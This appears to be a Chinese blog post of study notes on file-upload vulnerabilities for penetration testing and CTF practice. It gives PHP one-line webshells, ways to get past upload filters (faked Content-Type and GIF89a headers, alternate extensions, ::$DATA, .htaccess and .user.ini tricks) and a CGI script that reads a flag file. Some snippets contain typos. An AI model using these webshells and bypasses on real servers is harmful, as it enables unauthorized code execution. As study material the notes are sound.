文件上传学习笔记

最新推荐文章于 2024-08-11 23:26:20 发布
最新推荐文章于 2024-08-11 23:26:20 发布
阅读量599 收藏
点赞数 1
分类专栏: 文件上传 渗透测试 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/enver_jpg/article/details/117357692
版权

title: 文件上传学习笔记
date: 2021-5-22
tags: 渗透测试,文件上传,基础
categories:

渗透测试
文件上传
基础

文件上传学习笔记

2021/3/6 笔记

什么是一句话木马

一句话木马“服务端”(本地存储的脚本木马文件)
就是我们要用来将恶意代码上传到服务器的网站中执行权限
该语句触发后,接收入侵者通过客户端上传的数据,并完成相应的操作
好处:短小精悍、且功能强大
eval 意思是执行任意命令,将其当成php语言执行
<?php @eval($_GET[a]); ?>    加@是为了不在页面回显
<?php eval($_GET[a]); ?>
<?php eval($_POST[a]); ?>
<?php eval($_REQUEST[a]); ?>
<?php eval($_COOKIE[a]); ?>

一句话木马的变形

<?php assert($_POST[a]); ?>

连接工具

  • 中国蚁剑
  • 中国菜刀

文件检测手法

  • 客户端javascript校验(一般只校验后缀名)
  • 服务端校验
    • 文件头content-type字段校验(image/gif)(MIME类型)
    • 文件内容头校验(GIF89a)
    • 后缀名黑名单校验
    • 后缀名白名单校验
    • 自定义正侧校验
  • WAF设备校验(根据不同的WAF产品而定)
绕过
抓包,修改Content-Type:image/jpeg
文件头:伪造图片文件头(GIF89a)

客户端JavaScript校验

前端JS校验,可以直接绕过
  • 禁用JS
  • 删除οnsubmit="return chekFile()"
  • upload-labs Pass-01

文件头content-type校验

  • 直接上传木马图片,之后修改文件名为php可解析的后缀
  • 上传php文件,BP 抓包手动修改Content-type
  • upload-labs Pass-02

文件内容头校验

  • 手动伪造图片文件头,例如GIF89a
  • 在图片中插入PHP代码
  • upload-labs Pass-13

黑名单

<?php 
//实际情况中黑名单内数据会更多更全
$blacklist = array('php','asp','aspx','jsp');
$path = "./uploads";
$type = array_pop(explode('.',$_FILED['myfile']['name']));

if (in_array(strtolower($type),$blacklist)){
    die("File type errer!<br>");
}else{
    $file = $path.'/'.$_FILES['myfile']['name'];
    if(nove_uploaded_file($FILES['myfile']['tmp_name'],$file)){
        echo 'Success!<br>';
    }else{
        echo 'Error!<br>';
    }
}
?>

黑名单,尝试各种特殊文件名(php、Php、PHP、pht、php5、phtnl、shtml),或者在扩展名后添加空格、:: D A T A 、 . , DATA、., DATA.,,/…,等字符,子啊或者尝试上传‘.htaccess’

防御手段

随机文件名+白名单后缀

PHP:
php2	php3	PHP5	phtml	pht(是否解析需要根据配置文件中的设置类型来决定)
ASP:
asa	cer	cdx
ASPX:
ascx	ashx	asac
JSP:
jsp	jspx	jspf
绕过方法
php3	php4	php5
分别是php3版本	php4版本	php5版本的PHP文件,且向下兼容
upload-labs Pass-03

phtmlphtml是PHP2程序的标准文件扩展名upload-labs Pass-03

::$DATA(windows)上传文件为xxx.php::$DATA类型的文件。可以看到上传的文件为xxx.php::$data 。

大小写绕过.Php	.PHtmlupload-labs Pass-05

https://www.freebuf.com/column/143101.html

内容检测

  • 几种标签语法
    <??><?php<?=?><%<script lanague='php'>
    短标签
    两种短语标签必须在php5.4.0之后
    其中短语标签<? ?>需要在php.ini中开启配置short_open_tag才能使用
    <?= 等价于 <? echo 不用开启短标签
    <?= 'whoami'?><?= 'ls'?>

7.0.0	The ASP tags <%, %>, <%=, and the script tag <script language="php"> are ermoved from  php5.4.0	The tag <?= is always available regardless of the short_open_tag ini setting.

其中ASP标签<% %>需要将asp_tags设成On

通过php小于7.0的可以通过绕过

<srcipt language='php'>phpinfo();</srcipt>

当<? 被绕过时,可以尝试用<srcipt lanague='php'>绕过条件:PHP版本小于7.0BUU[极客大挑战2019]upload

PHP被过滤时,尝试用短标签<?        ?>绕过条件:PHP版本>5.4且php.ini中开启配置short_open_tag=1交出你的猫猫图

过滤GET POST,尝试用eval($_REQUEST[a]);绕过

过滤eval,尝试用assert($_GET[a]);绕过

.htaccess

//.htaccessaddtype application/x-httpd-php .jpg

上传.htaccess把.jpg当作PHP解析,只需要上传带shell的.jpg文件即可

//shell.jpg<script language='php'></script>

过滤文件内容

/.htaccessaddtype application/x-httpd-php .wuwuphp_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"

base64.b64encode(b"<?php eval($_GET['c']);?>")

php_value auto_append_file  会给PHP文件附加后面的内容将shell的内容上传至shell.wuwuhtaccess上传至.htaccess然后访问shell.wuwu即可/只能执行命令 不能连接shell
  • 上传cgi脚本
  • Options +ExecCGIAddHandler cgi-script  .xx
  • cgi脚本最好在Linux下编写,保存为3.xx
  • #!/bin/bashecho "Content_type:text/plain"echo ""cat /flagexit 0

    cig参考文档: https://www.freebuf.com/vuls218495.html

    没有过滤.htaccess的黑名单时,考虑上传.htaccess文件使得jpg文件解析为PHPupload-labs Pass-04

    当webshell中的字符全部被过滤的时候,考虑用.htaccess文件进行base64编码后上传

    如果可以上传.cgi文件和.htaccess文件,可以考虑上传cgi脚本https://unctf.hackingfor.fun/#/train    easy_upload

.user.ini

.user.ini用于nginx/apache/IIS中

#利用条件服务器脚本语言为PHP服务器使用CGI/Fast CGI模式上传目录下要有可以执行的PHP文件
.user.ini实际上就是一个可以由用户“自定义”的PHP.ini
*PHP_INI_模式的定义
模式含义
PHP_INI_USER可以在用户脚本(例如ini_set())或Windows注册表(自PHP5.3起)以及.user.ini中设定
PHP_INI_PERDIR可在php.ini、.htaccess或httpd.conf中设定
PHP_INI_SYSTEM可在php.ini或http.conf中设定
PHP_INI_ALL可在任何地方设定
auto_append_fileNULLPHP_INI_PERDIR在PHP <= 4.2.3时是PHP_INI_ALL
auto_detect_line_endings"0"PHP_INI_ALL从PHP4.3.0起可用
auto_globals_jit"1"PHP_INI_PERDIR从PHP5.0.0起可用
auto_prepend_fileNULLPHP_INI_PERDIR在PHP <= 4.2.3时是PHP_INI_ALL
auto_prepend_file string
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。使用方法很简单,直接写在user.ini中:

\x00\x00\x8a\x39\x8a\x39auto_perpend_file = cc.jpg

当不允许上传.htaccess服务器为nginx时,且为黑名单校验。请考虑上传.user.ini条件:服务器
仍在更新中… 敬请期待…
雅戈洛府
关注
专栏目录
文件上传学习
good_study123的博客
06-28 182
1、直接使用send_keys上传文件,需要文件上传是一个普通的input 元素 from selenium import webdriver import time driver=webdriver.Chrome() driver.get("http://localhost:63342/python29/web/class01_selenium/demo_%E7%BD%91%E9%A1%B5.html?_ijt=g48jseptfbgm0e7o398crhqu6q") """直接使用send_ke
蚁剑webshell连接报错A JavaScript error occurred in the main process
最新发布
qq_44846097的博客
09-10 500
将上传shell中文文件名修改为任意的英文文件名即可连接。
文件上传学习
10-08 80
今天试着做了下文件的上传,代码如下: Dim FullFileName As String Dim FileName As String FullFileName = File.PostedFile.FileName FileName = FullFileName.Substring(FullFileName.Las...
文件上传学习和绕过
震山的博客
09-16 288
文件上传的绕过方式和部分解决方法
关于文件上传学习心得
qq_32329839的博客
11-07 847
在写之前,先写一下关于文件上传的细节,也就是一些容易出错的地方: 1.文件必须保存在WEB-INF下。目的是为了避免浏览器直接访问到。 2.文件重名问题:我们知道,在一个服务器中,很多人上传文件以后会出现重名问题。这个时候,我们需要对其进行重命名。方法很简单,在文件名前面加上CommonUtils里的UUID即可解决问题。 3.文件的绝对路径问题。有的浏览器在保存时,会把上传文件的路径名也一
asp.net中多文件上传学习笔记
05-19
学习笔记将详细介绍如何在ASP.NET环境中实现这一功能,并确保文件上传时不重复。 首先,我们需要了解ASP.NET中的文件上传控件`<asp:FileUpload>`。这个控件允许用户选择一个或多个文件进行上传。在HTML表单中,...
学习笔记(1):java网络编程:ip获取,tcp聊天、上传文件
12-21
本文将深入探讨这两个主题,并提供一个简单的TCP聊天和文件上传的示例。 首先,我们要了解如何在Java中获取IP地址。在Java中,`InetAddress`类是处理IP地址和主机名的核心类。以下是如何获取IP地址的例子: ```...
Linux学习笔记文件
01-01
Linux学习笔记文件 摘要:本资源为 Linux 学习笔记文件,涵盖了 Linux 的基础知识,包括 vm 安装、终端的使用、文件系统与目录结构、远程访问、vi 与 vim 编译器、用户管理、关机重启与用户登录注销等方面的知识点...
文件上传下载学习
dengliao9491的博客
10-07 135
文件上传核心要通过设置表单的enctype=”multipart/form-data”(具体的请求体数据格式可以通过火狐浏览器的开发者工具看到)来告诉浏览器以二进制流的方式上传数据(而不是默认的application/x-www-form-urlencoded) 文件下载的核心要通过设置响应的头部属性content-disposition=attachment;filename=xx...
文件上传漏洞练习 upload-labs(1~5)【js过滤,MIME过滤,黑名单过滤,.htaccess文件攻击,.user,ini文件攻击】
bin789456的博客
07-25 955
文件上传漏洞练习 upload-labs(1~5)【入门】 写在前面 文件上传是个常见的漏洞,也是CTF的考察点之一。环境的搭建较为简单,放出链接: https://github.com/c0ny1/upload-labs 我直接使用Windows集成包,放在php下面跑就行。 因为隐私和web shell的特殊性,演示到上传成功就会结束题目 来吧,现在就开始。 Pass-01 这是一个最为常见的js过滤,即只能使用图片格式的后缀,否则不予上传。 方法一:先将脚本的后缀改为.jpg再上传,随后抓包改回来。
文件上传的各种绕过姿势
Goodric的博客
03-19 1811
文件上传绕过学习 做 ctf 的 web 方向常常遇到文件上传的题目,而且每题多少会有些不同。 于是搜集一番总结起来学习一下。 文件上传的校验 客户端 JavaScript 校验: 一般在 F12 源代码中可以看到,校验的是文件后缀名。 服务端校验: 1)文件头 content-type 字段校验(image/jpeg) 2)文件内容头的校验。 3)后缀名黑名单校验。 4)后缀名白名单校验。 5)自定义正则校验。 WAF设备校验 —— 文件上传校验的绕过 客户端绕过 前端会检测后缀,可以先上
渗透测试中的小tips
LiBai'S BLOG
11-03 2749
1、如果提示缺少参数,如{msg:params error},可尝使用字典模糊测试构造参数,进一步攻击。 2、程序溢出,int最大值为2147483647,可尝试使用该值进行整数溢出,观察现象。 3、403,404响应不灰心,尝试使用dirsearch等工具探测目录。 4、验证码简单绕过:重复使用,万能验证码(0000,8888),空验证码,验证码可识别(可用PKAV HTTP Fuzzer工具识别等) 5、短信轰炸绕过:手机号前加+86有可能会绕过,手机号输入邮箱,邮箱处输入手机号 6、如果验证码有实效,
Eval绕过限制参数限制
m0_61858762的博客
08-11 1072
Eval绕过限制参数限制等一些奇怪的技巧
文件上传upload,文件类型限制绕过
qq_61774705的博客
06-04 661
绕过后缀的有文件格式有php,php3,php4,php5,phtml,pht当过滤
GIF89a
weixin_59392781的博客
09-15 2126
GIF89a <script language="php">eval($_GET[shell])</script> 当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马。
文件上传验证绕过技术总结
热门推荐
ncafei的博客
11-29 5万+
转自  http://www.2cto.com/article/201308/233831.html  1.客户端验证绕过 很简单啦,直接使用webscarab或者burp修改一下后缀名就行。 2.服务端验证绕过-Content-type检测 若服务端检测文件类型时是检测Content-type的值,也很简单,在webscarab或者burp中修改Content
java 上传文件_JAVA学习笔记——fileUpload文件上传
05-17
文件上传是Web开发中常见的功能之一,Java中也提供了多种方式来实现文件上传。其中,一种常用的方式是通过Apache的commons-fileupload组件来实现文件上传。 以下是实现文件上传的步骤: 1.在pom.xml文件中添加以下依赖: ```xml <dependency> <groupId>commons-fileupload</groupId> <artifactId>commons-fileupload</artifactId> <version>1.3.3</version> </dependency> ``` 2.在前端页面中添加文件上传表单: ```html <form method="post" enctype="multipart/form-data" action="upload"> <input type="file" name="file"> <input type="submit" value="Upload"> </form> ``` 3.在后台Java代码中处理上传文件: ```java // 创建一个DiskFileItemFactory对象,用于解析上传的文件 DiskFileItemFactory factory = new DiskFileItemFactory(); // 设置缓冲区大小,如果上传的文件大于缓冲区大小,则先将文件保存到临时文件中,再进行处理 factory.setSizeThreshold(1024 * 1024); // 创建一个ServletFileUpload对象,用于解析上传的文件 ServletFileUpload upload = new ServletFileUpload(factory); // 设置上传文件的大小限制,这里设置为10MB upload.setFileSizeMax(10 * 1024 * 1024); // 解析上传的文件,得到一个FileItem的List集合 List<FileItem> items = upload.parseRequest(request); // 遍历FileItem的List集合,处理上传的文件 for (FileItem item : items) { // 判断当前FileItem是否为上传的文件 if (!item.isFormField()) { // 获取上传文件的文件名 String fileName = item.getName(); // 创建一个File对象,用于保存上传的文件 File file = new File("D:/uploads/" + fileName); // 将上传的文件保存到指定的目录中 item.write(file); } } ``` 以上代码中,首先创建了一个DiskFileItemFactory对象,用于解析上传的文件。然后设置了缓冲区大小和上传文件的大小限制。接着创建一个ServletFileUpload对象,用于解析上传的文件。最后遍历FileItem的List集合,判断当前FileItem是否为上传的文件,如果是,则获取文件名,创建一个File对象,将上传的文件保存到指定的目录中。 4.文件上传完成后,可以给用户一个提示信息,例如: ```java response.getWriter().write("File uploaded successfully!"); ``` 以上就是使用Apache的commons-fileupload组件实现文件上传的步骤。需要注意的是,文件上传可能会带来安全隐患,因此在处理上传的文件时,需要进行严格的校验和过滤
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值